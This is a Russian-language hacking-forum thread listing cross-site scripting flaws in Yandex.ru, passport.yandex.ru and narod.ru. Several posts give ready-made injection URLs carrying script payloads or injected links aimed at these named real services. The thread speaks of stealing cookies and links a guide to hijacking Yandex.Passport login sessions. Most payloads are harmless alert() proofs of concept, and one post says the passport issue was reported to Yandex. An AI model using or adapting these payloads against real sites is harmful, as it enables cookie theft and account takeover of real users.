• XSS.stack #1 – первый литературный журнал от юзеров форума

Yandex.ru

Отслеживать
Winux

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
XSS на Yandex.ru
logo76x44.gif

Товарисч Antiox обнаружил на известном российском поисковике/почтовике небольшую XSS багу. Она позволяет внедрить активный javascript сценарий в веб страницу и скоммуниздить куки. Спасибо товарисчу Antiox'у за такое изобретение. Аналогичная бага есть на nm.ru. О ней писали в одном из номеров ][.

Вот пример:
Код: 
http://passport.yandex.ru/passport?mode=register&login=Damagelab"><a href=http://xss.pro/>Вы взломали Яндекс. Кликни сюды.</a>&iname=xss.pro/&fname=xss.pro/
 
XSS на Yandex
logo76x44.gif

Подробнее о нахождении бага можно почитать тут: Бажный header() под микроскопом.

А суть баги в следующем:
Код: 
http://yandex.ru/redir/?url=[XSS]
 
XSS на narod.ru
Очередной межсайтовый скриптинг обнаружен на популярном хостинге narod.ru.

Пример №1:
Код: 
http://narod.yandex.ru/rubrics/top100.xhtml?
sort=xaxa><script>alert('xss.pro/')</script><a%20a=&c=2xaxa
Пример №2:
Код: 
http://www.narod.ru/guestbook/?owner=1&mainhtml=gb.txt
&messageshtml=%3Cscript%3Ealert('x')%3C/script%3E

Как видно бага в гесте и в топе сайтов.
 
Дока по взлому Yandex.ru - Атака на Yandex.Паспорт
logo76x44.gif

Статья является примером того как можно перехватить сессию аутентификации и получить доступ к чужому акку. Перехват основан на использовании куков.
Стата в принципе уже неактуальна, так как инфа была отправлена компании Yandex до публикации материала, но в познавательных целях - весьма полезно почитать.
:zns5: Скачать|Download
 
XSS на narod.ru

Межсайтовый скриптинг на народ ру. Пример:

Код: 
http://narod.yandex.ru/filemanager/fast_upload.xhtml?random_nocache=08144143dba68178291&d=
ft%2f%3E%3Cscript%3Ealert(%22Damagelab%20hacked%20you:)%22);%3C/script%3E%2F

Только не надо орать что не пашет. Все пашет, только надо находится в мастерской и иметь соответствующий кук.
 
Еще один XSS
Код: 
http://yandex.ru/yandpage?&q=1243559453&p=1&ag=d&qs=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript
%3E%3C%22&stype=1&text=1&rstr=-166---&how=tm
И еще
Код: 
http://yandex.ru/yandsearch?referrer1=1&referrer2=1&server_name=1&text=1&rstr=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+
Test%27%29%3C%2Fscript%3E%3C%22
И еще
Код: 
http://yandex.ru/yandpage?&q=1261610754&p=1&ag=d&qs=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript
%3E%3C%22&stype=1&text=1&rstr=-166---
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх